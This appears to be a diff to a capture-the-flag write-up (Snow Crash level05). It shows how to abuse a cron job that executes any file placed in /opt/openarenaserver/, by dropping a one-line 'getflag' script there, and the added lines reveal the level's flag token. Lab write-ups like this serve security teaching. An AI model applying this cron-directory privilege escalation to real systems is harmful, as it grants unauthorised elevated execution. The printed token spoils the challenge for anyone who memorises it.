tsiguenz/snow-crash/level05/resources/README.md

 done
 ```

-This script iterate on every files in /opt/openarenaserver/ and execute it with the permissions of the crontab owner.
+This script is a cron job, running every 30 seconds, that iterates on every files in /opt/openarenaserver/ and execute it with the permissions of the crontab owner, then erase it.
 We need to create a little script to get the flag:

 ```
-echo "getflag > /var/crash/flag" > /opt/openarenaserver/script
+echo "getflag > /tmp/flag" > /opt/openarenaserver/script
 ```

-Wait 2 minutes and get the flag:
+Wait 30 seconds and get the flag:

 ```
-$ cat /var/crash/flag
+$ cat /tmp/flag
-Check flag.Here is your token : xxxxxxxxxxxxxxxxxxxxxxxxx
+Check flag.Here is your token : viuaaale9huek52boumoomioc
 ```